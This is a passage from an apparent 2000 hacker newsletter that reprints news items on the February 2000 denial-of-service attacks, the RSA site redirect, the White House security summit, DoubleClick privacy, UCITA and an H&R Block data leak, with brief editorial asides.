      Washington Post Staff Writers
      
      Tuesday, February 15, 2000; Page E1
      
      Federal agents chasing the hackers who brought down a string of high-profile
      Web sites are preparing to question several suspects in the case, sources
      familiar with the investigation said yesterday.
      
      One of those people, "Coolio," is located in the United States, the sources
      said. That is also the name used by a person who early Sunday defaced a company
      Web site for one of the most trusted names in the security business. A second
      is allegedly a Canadian teen known online as "mafiaboy." And a third is a male
      who allegedly "confessed" to a staff member of the popular security site
      Attrition.org.
      
      Law enforcement officials and independent cyber-sleuths have been able to link
      the online aliases to real names and addresses, and FBI agents are expected to
      begin questioning them as early as today.
      
      Meanwhile, representatives of some of the biggest high-tech businesses are
      scheduled to gather at the White House at 11 a.m. The companies have agreed to
      jointly call for a voluntary, industry-led coalition that will share
      information on cyber-attacks and how to respond to them--a step that security
      experts hailed as critical to discouraging future attacks.
      
      The person suspected of mounting the first attacks was named in a three-page
      e-mail sent to FBI agents late Wednesday by two computer experts, David Brumley
      of Stanford University and Joel de la Garza of Securify.com, a security company.
      
      The two men analyzed the log files from several of the recent "denial of
      service" attacks--which involved bombarding Web sites with so many requests for
      information that legitimate users were effectively shut out--and traced them
      back to a single individual. Brumley, a 24-year-old security administrator for
      the school, says they were able to quickly discover the person's online alias
      and his physical location down to the city.
      
      He said the attacker appeared to have significantly modified programs that are
      widely available on the Internet.
      
      "I think this guy is more sophisticated than a script-kiddie," Brumley said
      yesterday. "But he's not a computer-science genius. . . . Chances are it's
      someone who is either in college and has taken several computer-science classes
      or is a professional in the industry. We are seeing that the guy knows what
      he's doing."
      
      Brumley also said his analysis shows that it's likely that the attacks--which
      in addition to Yahoo and eBay hit sites including Amazon.com, CNN.com and
      Buy.com--were carried out by at least two groups because they used different
      strategies.
      
      Still, other experts point out that some popular attack programs often mix the
      two attack strategies because each exploits different vulnerabilities in a
      network. Indeed, company officials have said ZDNet and Buy.com were hit by both
      types of attacks simultaneously.
      
      This weekend, hackers manipulated an entry in a database that matches Internet
      addresses to their legitimate home pages so that www.rsa.com--the main page for
      RSA Security, a leader in the encryption business--would point to a mock site
      in the South American country of Colombia. The dummy page contained the words
      "Owned by Coolio" and linked to a recent RSA press release, "RSA Laboratories
      Unveils Innovative Countermeasure To Recent 'Denial of Service' Hacker Attacks."
      
      The second potential suspect--"mafiaboy"--is likely a copycat attacker,
      according to Michael Lyle of Recourse Technologies Inc. in Palo Alto, Calif.
      
      Last week, mafiaboy showed up on one of the many Internet Relay Chat channels
      frequented by hackers and sparred with the other visitors.
      
      "We entered into a number of conversations with mafiaboy and we saw him asking
      for suggestions on what sites to attack and after someone would suggest a site,
      that site would go down," Lyle said.
      
      Lyle declined to provide the log files for his conversations with the alleged
      hacker but another person investigating mafiaboy's connection to the attacks
      offered a brief transcript.
      
      Making a bilingual play on the word "packet"--the term for the uniform chunks
      of information that computers on the Internet break data into for sending--the
      hacker joked about being rumored to be the "Canadian pacquet monkey" and that
      he was responsible for paralyzing some of the high-profile sites. He mused
      profanely about how heavily the discussion might be monitored and said "better
      stop talkin . . . say nothing, know nothing, be nowhere."
      --------------------------------------------------------------------------------
      
      A third possible attacker being investigated by the FBI is a male who has
      engaged the people in Attrition.org in e-mail messages and chats and bragged
      about his victories, the sources said.
      
      In e-mail sent last week to one of the people who run the site, the hacker
      states: "If you notice the targets, They are all PUBLICLY traded companies,
      This was an attempt to put a 'Scare' into internet stock holders, Also, Attacks
      WILL be carried out against Online trading companies, Dow, Onlinetrade,
      E-Trade, etc."
      
      Brian Martin, an independent security expert, said that, historically, multiple
      groups have been involved in high-profile cyber-crimes. "Copycatting and
      copying style is very common," he said.
      
      A source involved in the federal investigation declined to say whether any
      suspect was under special scrutiny but said: "It is fair to say we're tracking
      down anyone taking credit for it."
      
      Law enforcement officials cautioned, however, that their intention to interview
      the people who have emerged in the investigation does not mean they are
      necessarily solid suspects in the case.
      
      Attorney General Janet Reno and FBI Director Louis J. Freeh are scheduled to
      appear before Congress tomorrow to discuss the hacker case and the overall
      problem of computer crime and cyber-terrorism. Meanwhile, one law enforcement
      official cautioned yesterday that authorities don't expect to complete the
      hacker probe any time soon and are "planning for a long investigation."
      
      Rloxley, a "white hat" hacker who maintains the "hackphreak" channel on
      Internet Relay Chat, scoffed at the notion that "mafiaboy" could pull off such
      an ambitious series of attacks: "Mafiaboy wishes that it was mafiaboy."
      
      The rush by some companies to capitalize on publicity and service as a result
      of the attacks--especially security firms attempting to find and reveal the
      hacker--has some observers worried.
      
      "We're seeing companies with no investigative background going to the press
      even before they go to the police! It would be a shame to see someone not get
      caught because the security companies are trying to one-up each other," said
      John Vranesevich, who owns the hacker-tracking AntiOnline site.
      
      The text of the joint statement by high-tech companies steers away from any
      proposal that might be cause for overly invasive monitoring of the nation's
      computer networks by law enforcement, but it recalls the efforts undertaken by
      industry to meet the challenge of the Y2K problem. Many in the business
      community say the Y2K fix-up effort was a model of the kind of public-private
      partnership that could be effectively applied to computer security.
      
      According to one participant in the planning of the event, the Clinton
      administration will make similar recommendations.
      
      Some Internet security experts, however, suggested that today's summit will not
      deliver much.
      
      "I think it is mostly harmless," said Sean Donelan, a former researcher at AT&T
      Laboratories now at California-based Equinix. Donelan noted that the attendees
      are largely corporate types and not techies: "They'll have their pictures
      taken, and more than likely the government officials won't even stay for the
      whole meeting. The White House probably doesn't have enough power outlets if
      everyone brought their laptop," he joked.
      
      Staff writer David A. Vise contributed to this report.
      
                            (c) 2000 The Washington Post Company
      @HWA
      
45.0  HNN:Feb 15th:Hackers Invited to Summit
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/
 
      contributed by janoVd 
      
      20 executives from technology companies, as well as academics and
      officials from the National Security Agency, were invited to attend a
      technology summit with President Clinton. The summit hopes to look at
      ways to tighten security on the World Wide Web. One of the invites is
      Mudge, hacker from the security consulting company @Stake.
      
      Associated Press - via Boston Globe
      http://www.boston.com/dailynews/046/economy/Clinton_taking_up_Web_security:.shtml
      
      (404)
      
      
      @HWA

 

46.0  HNN:Feb 15th:Stacheldraht Author Retires
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/ 

 
      contributed by randomizer 
      
      The author of the DDoS tool Stacheldraht, Randomizer, told HNN today
      that he will not continue his work in the field and will not start
      developing on the next version of Stacheldraht called Blitzkrieg. "All
      that media hype is too much for me. I do not want to be the scapegoat
      for the security agencies, only cause some people abuse the tools I
      wrote." Randomizer said on early Tuesday. He indicated that he wants
      now to focus more on his "real life".
      
      Heise - German
      http://www.heise.de/newsticker/data/pab-15.02.00-000/
       
      @HWA
      
       
      
47.0  HNN:Feb 15th:CNN News Chat with Clinton Compromised?
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/      
       
      contributed by cult hero
      
      In an email statement to the White House CNN News admitted that someone
      was able to bypass the filters they had put in place for an online chat
      with the President. The presidential impostor then said "Personally,
      I'd like to see more porn on the Internet, Wolf how about you?" in
      response to a question about Clinton's thoughts on the Internet. Fox
      news has labeled the incident a prank and has refused to say that they
      were hacked. (Sounds like a simple net split, doesn't even rank as a
      prank.)
      
      Fox News
      http://www.foxnews.com/vtech/021400/hack.sml
      (404)
      
      @HWA
      
48.0  HNN:Feb 15th:RSA Web Page Redirected
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/
       
      contributed by Weld Pond 
      
      Encryption security firm RSA had an older web page redirected to a site
      calling for more lax export controls on encryption products. It would
      appear that RSA did not even have password authentication set up on its
      DNS entries.
      
      ZDNet
      http://www.zdnet.com/zdnn/stories/news/0,4586,2437384,00.html
      
      The Register
      http://www.theregister.co.uk/000214-000025.html
      
      RSA Security site defaced

      Computer criminals, keen to make a point
      about the insecurity of Domain Name System
      authentication, hit an older site maintained
      by the network security provider.



      By Will Knight, ZDNet (UK)
      February 14, 2000 11:21 AM PT 


      Another Web attack, this time on encryption security
      firm RSA.

      Computer security firm RSA Security Inc. (Nasdaq:
      RSAS) had one of its Web sites effectively defaced by
      computer criminals apparently keen to make a point
      about the insecurity of DNS (Domain Name System)
      authentication. The affected site is an older RSA site, not
      its primary home page. 

      According to security and encryption expert Brian Galdman,
      the culprits appear to have gained access to a high-level 
      DNS server rather than broken into the server that hold 
      the page itself. 

                       This latest high-profile attack adds
      to the argument that, as illustrated by the recent spate of
      distributed denial-of-service attacks, there remain major
      security issues -- even for the best-equipped Web sites. 

      Pointer page defaced
      By noon on Monday, http://www.rsa.com led to a defaced
      page with a virtually incoherent message. However, the
      server on which the Web site exists hasn't been hacked:
      The domain name simply points to another IP address. A
      spokesman for RSA said that http://www.rsa.com is RSA
      Security's old Web site, which is maintained as "a
      pointer" to the official Web site at
      http://www.rsasecurity.com. 

      Although hacks on DNS servers aren't unknown,
      Galdman said the problem points to more
      serious issues with the Internet's infrastructure.
      He said that if these malicious computer
      hackers have access to  enough DNS servers
      they could, in theory at least, "take down the whole
      Internet." 

      The target is probably no coincidence, Galdman said.
      Attacking a firm specializing in encryption may illustrate
      dissatisfaction with the U.S. government for restricting
      access to strong encryption, he said. "This shows the
      extreme folly of the U.S. government, in particular, in
      preventing technology that would prevent this sort of
      attack being deployed. They're making the point that
      they're not secure. Hopefully, someone will start asking
      why they're not." 

      The RSA site has now been pulled down. A company
      spokesman said it will be about 24 hours before it goes
      live again. 

      Several groups have proposed a more secure form of
      DNS, but none has yet been implemented. For example,
      RFC 2137, first proposed in April 1997, outlines a method
      to use digital signatures to ensure that only authorized
      persons can update a DNS record. 
      
      
      -=-
      
      Posted 14/02/2000 7:37pm by Thomas C. Greene in Washington

      Internet security firm RSA's Web site hacked

      RSA Security has suffered the embarrassment of having its home page 
      "defaced" by an intruder.

      The original defaced page can be found at 
      http://www.2600.com/hacked_pages/2000/02/www.rsa.com/

      Now it get's complicated: there is a <i>second</i> defaced RSA home page, 
      in which the company's       site appears to be "owned" by the an 
      intruder. This is  a plain white page bearing a simple message.

      However, the IP address of RSA.com (205.181.76.22) and the IP address of 
      the  second "hacked" page       (200.24.19.252) -- are not the same. 

      The hacked page, a computer security firm employee writes,  is on a 
      "computer in the University of       Antigua - 
      (http://bachue.udea.edu.co/).

      So what happened? One theory put forward by a very knowledgeable reader is 
      that "the nameserver was       hacked and the www.rsa.com IP forwarded to 
      another hacked box which was used to host the defaced page. This box must 
      have been hacked again, by someone else and a new page put up".

      The Register found the following text on the new defaced page (we've 
      deleted part of the phone number       for obvious reasons), 

      "Wat up whats up to all my nigs ya know who ya are n #2600 and whats up 
      all my #sesame nigs and call       rigger if ya come here bc he is the 
      gayest fuck ;) 718-815-**** all chans are on a irc server lol -tek pBK > * 
      also irc.segments.org ;)"

      
      For those not fluent in h4x0r dialect, the gentleman or lady who hacked 
      the RSA page wishes to offer warm salutations to all of his or her 
      colleagues from the IRC channels #2600 and #sesame, and further invites 
      all concerned to place nuisance phone calls to a gentleman or lady known 
      as rigger ( a notorious hacker, apparently) , either as a friendly prank, 
      or for malicious purposes. The overall tone suggests the former is 
      intended.

      Additionally, we note that "nigs" should not be construed to express any 
      racist sentiments, but is best       understood as a term of fraternal 
      affection along lines expressed by the familiar "homies".

      In the interests of investigative journalism we visited the #2600 and 
      #sesame channels on       irc.segments.org, following the message's 
      reference to that network, but found ourselves alone with a bot which 
      advised us, "Welcome to #2600 sit down and shuddup or fear a nice /kill or 
      /kline."

      
      A subsequent visit to the same two channels on the more h4x0r-friendly 
      efnet.org yielded the expected result, two rooms chock full of quiet, 
      paranoid hackers and eager, chatty wannabes.

      
      No one volunteered any information which The Register felt was up to its 
      impeccable standards of journalistic dependability, so we must refrain 
      from passing along speculation proffered by anonymous strangers.

      The hack follows closely on the heels of RSA's boastful announcement last 
      week that it was developing some       new magic bullet to thwart DDoS 
      attacks. The idea behind it is clever, we must allow: a cryptographic 
      technique using so-called "client puzzles" which would accompany 
      connection requests.

      "During an attack, legitimate clients would experience only a small 
      degradation in connection time, while       the attacking party would 
      require vast computational resources to sustain an interruption of 
      service. As a result, the subsequent burden of numerous requests placed 
      back on the attacking party would severely limit its ability to continue 
      the attack," RSA says.

      
      Of course the selection of RSA's home page for a graffiti attack could be 
      a mere coincidence, or it could be a reply from the hacking underground 
      meant to remind the company, and the rest of us by extension, that, all 
      boasting aside, if you are connected to the Internet, you can be hacked, 
      one way or another.

      
      A worthwhile reminder for all of us, we must add. 


      (Its articles like this one from The Register that make me sure that 
      archiving this material is a worthy
       cause, its priceless ... ;) - Ed )
       
      @HWA       
       
      
49.0  HNN:Feb 15th:Doubleclick Announces New Privacy Plan
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/
      
       
      contributed by Joey 
      
      Based in New York DoubleClick is the nation's largest Internet ad
      agency, electronically inserting advertisements on about 1,500 Web
      sites. Last fall the company bought direct-marketing company Abacus for
      $1.7 billion, and recently started to cross-reference information
      obtained by cookies with consumer information from the Abacus marketing
      database. DoubleClick has now unveiled an advertising campaign that
      attempts to portray itself as a consumer-friendly
      company that goes out of its way to protect consumers' privacy.
      The company will place 50 million banner advertisements on Web sites,
      and retain PricewaterhouseCoopers to start independent audits of its
      privacy practices.
      However they will continue to match surfing habits with purchasing
      decisions.
      
      Associated Press - via Detroit Free Press
      http://www.freep.com/business/web15_20000215.htm
      
      Ad firm fuels debate over
      Web privacy 

      DoubleClick says it does not spread
      consumers' data 

      February 15, 2000

      ASSOCIATED PRESS

      On-line advertising agency DoubleClick launched a
      counterattack Monday against repeated
      accusations that it invades consumers' privacy on
      the Internet, but the effort exacerbated a clash with
      privacy advocates seeking a government
      clampdown.

      The widened rift underscores the increasing
      controversy between a marketing industry eager to
      harness the Internet's power to reach customers
      and those who fear the intrusion to people's
      confidential information, such as spending habits,
      health status and product preferences.

      New York-based DoubleClick is the nation's
      largest Internet ad agency, electronically inserting
      advertisements on about 1,500 Web sites. But last
      fall the company bought direct-marketing company
      Abacus for $1.7 billion, irking privacy advocates
      with plans to cross-reference information obtained
      by Web "cookies" with consumer information from
      the Abacus marketing database.

      A cookie is a small file a Web site deposits on your
      hard drive, often with a number that identifies the
      user's computer. The next time someone using that
      computer goes back to the site, the site recognizes
      the computer.

      DoubleClick, targeted in a lawsuit filed last month
      and a complaint filed with the Federal Trade
      Commission last week, is accused of seeking to
      build virtual dossiers on unwitting consumers'
      buying habits and identities, with the intent to sell
      the data to advertisers who can barrage people
      with ads.

      DoubleClick fought back Monday, unveiling an
      advertising campaign that attempts to portray itself
      as a consumer-friendly company that goes out of its
      way to protect consumers' privacy.

      Measures include placing 50 million banner
      advertisements on Web sites, making it easier for
      Web users to opt out of giving marketers
      confidential details about their shopping habits.
      DoubleClick also said that
      PricewaterhouseCoopers would start
      independent audits of its privacy practices.

      Yet, privacy advocates immediately termed the
      DoubleClick effort window dressing, saying it
      avoids the main issue: linking information users
      believed was anonymous with a database of names
      and consumer buying habits.

      The Electronic Privacy Information Center, an
      advocacy group in Washington, filed the complaint
      with the FTC. The group also is pushing for federal
      legislation that would regulate the use of personal
      information and cookies on the Internet.

      The conflict puts DoubleClick at the vortex of a
      wider debate over how far businesses should go to
      target consumers.
      
      
      @HWA 
      	
      	
50.0  HNN:Feb 16th:UCITA Passes In Virginia
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/      
       
      contributed by Erik 
      
      The Virginia House of Delegates on Monday unanimously passed Uniform
      Computer Information Transactions Act.  Among other things UCITA allows
      software companies to 'repossess' software or to turn it off remotely.
      (What is surprising is that it passed unanimously. Do AOL and other
      software companies have that much influence in VA?)
      
      InfoWorld
      http://www.infoworld.com/articles/ec/xml/00/02/14/000214ecucita.xml
      (*yawnfest*, dry reading, for article follow link... - Ed)     
      
       
      @HWA
      
51.0  HNN:Feb 16th:Read Our Lips: No New Net Laws
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
            
      From HNN http://www.hackernews.com/      
       
      contributed by janoVd 
      
      Executives from the nation's leading Internet companies told President
      Clinton at the White House yesterday that despite a perceived increase in
      Internet related crime, they saw no need for an increase in government
      regulation of the industry. (YEAH!)
      
      NY Times
      http://www.nytimes.com/library/tech/00/02/biztech/articles/16net.html
      (Pay to play site, anyone have an account here?)
      
      CNN
      http://www.cnn.com/2000/TECH/computing/02/15/hacker.security/
      
      
      Clinton fights hackers, with a hacker

      February 15, 2000
      Web posted at: 1:51 p.m. EST (1851 GMT)

      From staff and wire reports

      WASHINGTON -- Searching for ways to improve security on the Internet, 
      President Bill Clinton convened a meeting at the White House on Tuesday 
      with technology experts that included a hacker named Mudge. 

      Saying security on the Internet should be improved without jeopardizing 
      the entrepreneurial potential of e-commerce, the president endorsed a $9 
      million proposal to create a high-tech security institute. 

      "We know we have to keep cyberspace open and free," Clinton said. "At the 
      same time, computer networks (must be) more secure and resilient and we 
      have to do more to protect privacy and civil liberties." 

      The meeting follows a blizzard of assaults last week that disabled some of 
      the nation's most popular Web sites, among them CNN.com, eBay, Yahoo, 
      Amazon.com and E*Trade. 

      Republican lawmakers have criticized related Clinton proposals in the 
      past, saying they have not done enough to protect federal computer 
      systems. 

      But U.S. Secretary of Commerce William Daley, who took part in the 
      session, said the U.S. government can "lead by example" to ensure national 
      networks are secure. 

      "The tools are out there, but not many companies are taking advantage of 
      them. We in government can provide an example by getting our own house in 
      order," he told reporters.

      Sun, MCI, IBM and Mudge

                          The president invited more than a dozen computer 
                          executives and academics who specialize in computer 
                          technology to the session. Companies represented 
                          included America Online, Yahoo!, 3Com, Cisco Systems, 
                          Sun Microsystems, MCI Worldcom, IBM, AT&T, Hewlett 
                          Packard, Intel and Microsoft, said White House 
                          spokesman Joe Lockhart. 

                          Among the participants was Mudge, nickname for a 
                          member of a "think tank" of hackers who perform 
                          security consulting under the name @Stake. The White 
                          House released a list of participants that included an 
                          @Stake representative named Peiter Zatko. 

                          Mudge, in a business suit with his long brown hair 
                          hanging down on his chest, sat quietly with his 
                          fingers interlocked atop his blue briefing books. He 
                          is also a member of the celebrated hacker group L0pht 
                          Heavy Industries, based in Massachusetts. 

      Another participant, Whitfield Diffie of Sun Microsystems, set up his 
      laptop on the conference table, an agenda on the screen. 

      No 'electronic Pearl Harbor'

      The initial idea of the meeting was to address the problem of terrorists 
      using cyberspace. But Clinton said the attacks last week underscore a need 
      for the government to focus on protecting the Internet itself. 

      "These denial-of-service attacks are obviously very disturbing and I think 
      there is a way that we can clearly promote security," Clinton told CNN.com 
      Monday in an online interview. 

      But Tuesday he cautioned that the attacks were not an "electronic Pearl 
      Harbor." 

      "I don't think we should leave here with this vast sense of insecurity," 
      Clinton said at the Tuesday meeting. "We ought to leave here with a sense 
      of confidence that this is a challenge that was entirely predictable. It's 
      part of the price of the success of the Internet." 

      Summit also tackles cyberterrorism

      Lockhart said beforehand that the participants mainly would review 
      Clinton's $2 billion proposal for protecting the nation's computer 
      infrastructure from sabotage; about $91 million of that would go toward 
      addressing cyberterrorism. 

      "The meeting is not to come out with new budget numbers or detailed policy 
      initiatives. It's to make sure we are on the right track," Lockhart said. 
      "One of the goals the president has is to make sure that each of these 
      important companies is talking within their industry about what they can 
      do." 

      One challenge for vulnerable companies is how to share warnings on attacks 
      without causing undue panic or releasing corporate secrets. 

      Managers of a recently formed private security network for banks said 
      computer experts at some of the nation's largest financial institutions 
      received detailed warnings of impending threats days before last week's 
      attacks began on major sites. 

      Hacking warnings not passed to FBI

      But banking officials never passed those warnings to the FBI or other law 
      enforcement agencies, because they weren't allowed to do so under rules of 
      the unusual security arrangement, formed with the government's 
      encouragement. 

      To encourage open participation by banks and other financial firms, the 
      Treasury Department decided that information disclosed within such a 
      network would not be turned over to federal regulators or law enforcement 
      agencies. It worked well for the banks that were forewarned about the 
      attacks last week but the system also ensured the same warnings were not 
      widely distributed. 

      The banking network issued the first alert in the latest attacks on 
      February 4, "when we started seeing certain machines being compromised," 
      said William Marlow of Global Integrity Corp., which runs the network. 
      Yahoo! was attacked four days later. 

      America Online is awaiting approval of a merger with Time-Warner, the 
      parent company of CNN. 

      Correspondents Steve Young, Major Garrett and The Associated Press 
      contributed to this report.
      
      
      @HWA
      
52.0  HNN: Feb 16th:Tax Returns Inadvertently Made Public
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/
      
       
      contributed by acopalyse 
      
      H&R Block's online tax filing service exposed at least 50 people's
      sensitive financial records to other customers last weekend, prompting
      the company to shut down the system yesterday afternoon. H&R Block said
      that the glitch only effected web filers and that the system would remain
      offline until it was fixed.
      
      C|Net
      http://news.cnet.com/news/0-1005-200-1550948.html
      
      
      Breach exposes H&R Block customers' tax records By Courtney Macavinta 
      Staff Writer, CNET News.com February 15, 2000, 7:10 p.m. PT 

      H&R Block's online tax filing service exposed some customers' sensitive 
      financial records to other customers last weekend, prompting the company 
      to shut down the system yesterday afternoon, CNET News.com       has 
      learned.

      The company's Web-based tax preparation service, which is the premier 
      sponsor of Yahoo's Tax Center, experienced a technical glitch that 
      accidentally switched some tax filers' records, H&R Block confirmed today. 
      As a result, when       some registered users signed on to the service to 
      work on their tax returns, they instead received someone else's 
      filing--including a social security number, home address, annual income 
      and other highly sensitive information.

      "What we discovered was that some of our clients' data was appearing in 
      other clients' data files," said Linda McDougall, vice president of 
      communications for H&R Block. "We're keeping it down until we're convinced 
      that the problem       has been corrected."

      McDougall emphasized that the problem only affected the Web-based 
      preparation and filing of returns. Taxes processed with H&R Block's 
      preparation software or at one of the company's offices were not       
      exposed, she said. 

      The software glitch revealed the confidential records of at least 50 
      people, although the full extent of the problem will not be known until 
      the company completes an internal audit, McDougall said. She added       
      that at least 10 customers have contacted the company about the problem. 

      "Once we determined this, we took our system offline immediately and we 
      began an audit of our entire customer database," McDougall said.

      "We're confident that it wasn't due to a hacker--we feel that it was a 
      software problem within our system," she added. "No return has been filed 
      to the Internal Revenue Service that contains inaccurate data."

      This is the second time in two weeks that H&R Block's $9.95 
      "Do-it-yourself" Net filing service--which more than 300,000 people have 
      used so far this year--has suffered a technical problem and had to be       
      shut down. H&R Block expects to handle more than 650,000 returns via the 
      Net this year.

                    Other Web sites also have had security concerns in recent 
                    months. For example, RealNames, a company that substitutes 
                    complicated Web addresses with simple keywords, warned its                     
                    users last week that its customer database had been hacked, 
                    and that user credit card numbers and passwords may have 
                    been accessed.

                    The H&R Block privacy breach was no doubt startling to some 
                    users who chose the 40-year-old company over other online 
                    services, such as Intuit's TurboTax software. User anxiety 
                    was intensified because it                     occurred on 
                    the weekend, making it difficult to locate an H&R Block 
                    employee who could address the problem.

      Joshua Kasteler of the San Francisco Bay area said he was tackling his EZ 
      1040 on Sunday when the H&R Block system started to act sluggish. Kasteler 
      logged off, and when he signed on to the password-protected site an hour       
      later, he was given access to the records of another H&R Block customer.

      "Instead of my information, it was a gentleman from Texas who worked for 
      Advanced Micro Devices," Kasteler said, noting that the forms also listed 
      the other person's phone number, address, social security number and 
      annual       income. "I assumed that someone else has my information, too, 
      because this guy's information fell into my lap. I had this guy's life."

      Kasteler said he emailed and called H&R Block but still had not heard back 
      from the firm as of late today. So he decided to call the man whose 
      information he had accessed: James Keech, a maintenance technician who 
      also had       trouble with the H&R Block site and had been unable to 
      process his return since Thursday.

      "When (Kasteler) called, I was freaking," Keech said. "I was like, 'If 
      he's got it, how many other people have my file and aren't being honest 
      and letting me know.' "

      Keech said he called H&R Block and was told that there had been a security 
      problem. He has asked that his data be deleted from the system.

      "I'll probably go to a regular tax filing office now," he said. "It would 
      have been easier to fill it out on paper."

      The 1040 EZ is a simplified IRS form that does not include information 
      such as itemized deductions, capital gains or rental income. 

      H&R Block's privacy policy states that "information contained in your tax 
      return will be treated with extreme care and confidence...we will never 
      disclose any tax return information without your consent." Like many Web 
      sites, however,       the policy doesn't address information that is 
      accidentally disclosed without permission.

      With the growth of the Net, consumer advocates have been pushing for 
      umbrella data-protection laws to safeguard U.S. computer users, who may be 
      giving up more information in the digital age that makes them vulnerable 
      to fraud and
      privacy breaches. 
      
      
      @HWA
      

53.0  HNN:Feb 16th:AOL Intruder Sentence Increased
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/ 
      
       
      contributed by Erik 
      
      When Jay Satiro was sentenced for intruding into AOL computer systems
      last December his sentence banned him from computer use but left
      exceptions for employment and education uses.  Judge John Perone has now
      removed those exceptions, and has ordered his mother to use a portable
      computer that can be locked up away from Mr. Satiro. (Just how the
      hell is this guy expected to contribute to society if he can not even
      touch a computer?)
      
      NY Times
      http://www.nytimes.com/aponline/f/AP-AOL-Hacked.html
      (pay to play...)
      
      @HWA
      
54.0  HNN:Feb 16th:China Denies Defacing Japanese Sites
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/      
       
      contributed by Evil Wench 
      
      Foreign Ministry officials in China have said that there is no way to
      confirm that recent attacks on various Japanese web sites have originated
      in China. Officials have reaffirmed their opposition of such behavior
      
      Reuters - via Excite
      http://news.excite.com/news/r/000215/05/net-japan-hackers
      (Server: "We're sorry, but this story is not currently available" -Ed )
      
      
      
      
      @HWA
      
55.0  HNN:Feb 16th:Tulsa Police Break Up Online 'Gang'
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/      
       
      contributed by Anonymous 
      
      Police in Tulsa, Oklahoma have raided two area youngsters who are
      believed to have stolen credit card numbers and crashed two Oklahoma web
      sites.  After the information on the confiscated equipment is analyzed
      arrests may be made.
      
      KOTV
      http://www.kotv.com/pages/viewpage.asp?id=3182
      
      
      @HWA
      
56.0  HNN:Feb 17th:Feds still nvestigating
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/ 
      
       
      contributed by ben 
      
      In the classic slow style of the US Government, federal law enforcement
      officials are still investigating last week's denial of service attacks.
      Sources close to the investigation have said that they are following
      "very strong leads". The names of mafiaboy, coolio, and machoman have
      been mentioned in numerous media outlets but no hard evidence yet links
      them to the crimes.
      
      Associated Press - via Excite
      http://news.excite.com/news/ap/000216/17/news-hacker-attacks
      (unavailable...)
      
      CNN - video
      http://cnn.com/videoselect/#     
      
      
      @HWA
      
57.0  HNN:Feb 17th:Correction: UCITA Did Not Pass In VA, Yet.
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/
      
       
      contributed by White Vampire 
      
      Yesterday HNN incorrectly reported that the Virginia Legislature passed
      into law the Uniform Computer Information Transactions Act.
      They did pass joint resolutions HJ277 and SJ239 which will create a
      joint subcommittee to study the UCITA and its language.
      
      Slashdot
      http://slashdot.org/comments.pl?sid=00/02/14/2221203&cid=378
      
       
      Late Update 11:50
      
      Well it would seem that interpreting legal jargon within the Sate
      legislature of Virgina is a little more difficult than first thought.
      It would now appear that UCITA did in fact make it into law by amedning
      title Title 59.1.  But here, read it for yourself:
      
      House
      Bill 561: Creates the Uniform Computer Information Transactions Act
      (UCITA). UCITA was promulgated by the National Conference of
      Commissioners on Uniform State Laws (NCCUSL)
      Passed
      95-2, 1 abstain.
      
      Senate
      Bill 372: Creates the Uniform Computer Information Transactions Act
      (UCITA). UCITA was promulgated by the National Conference of
      Commissioners on Uniform State Laws (NCCUSL). 
      Passed 39-0
      
      
      
      @HWA
      
      
58.0  HNN:Feb 17th:Defense Message System Has Serious Holes
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/
      
       
      contributed by Evil Wench 
      
      During operational tests of the $1.6 million Defense Message System
      software Version 2.1, an information warfare test team "was able to
      penetrate all but one test site with only a moderate level of effort,"
      according to the DOD's 1999 annual OT&E report, released this week. The
      test was conducted last year by the Defense Department's Office of
      Operational Test and Evaluation, As a result of the failure, the
      Pentagon's OT&E director concluded that DMS Version 2.1 was "not
      operationally effective."
      
      Federal Computer Week
      http://www.fcw.com/fcw/articles/2000/0214/web-dms-02-16-00.asp
      
      DMS security cracked during testing

      BY Daniel Verton 02/16/2000 

      Information warfare tests conducted in September 1999 on the Pentagon's 
      $1.6 billion Defense Message System found serious deficiencies in the 
      system's security protections.

      During operational tests of DMS software Version 2.1, conducted last year 
      by the Defense Department's Office of Operational Test and Evaluation, an 
      information warfare test team "was able to penetrate all but one test site 
      with only a       moderate level of effort," according to the DOD's 1999 
      annual OT&E report, released this week. As a result of the failure, the 
      Pentagon's OT&E director concluded that DMS Version 2.1 was "not 
      operationally effective."

      DMS was scheduled to replace the Pentagon's aging Automatic Digital 
      Network (Autodin) message system at the end of last year. Developed in the 
      1960s, Autodin passes message traffic through a global network of highly 
      secure but       antiquated mainframes that use tape reels for data 
      storage.

      Plans for DMS deployment include installing the software on more than 
      360,000 desktops at more than 7,000 locations throughout the department.

      According to the report, the inability of system administrators to 
      adequately set up and configure DMS software securely led to gaps in 
      network security that were easily breached. Evaluators also blamed the 
      problem on the complexity of       the software.

      "The underlying factors are the complexity of DMS, the need to reconfigure 
      DMS to integrate it with each distant site's supporting architecture and 
      the lack of automated aids to check DMS security posture once it is 
      installed or after it is       reconfigured," the report stated.


      
      
      @HWA
      
59.0  HNN:Feb 17th:CIA Startup Works on Net Security
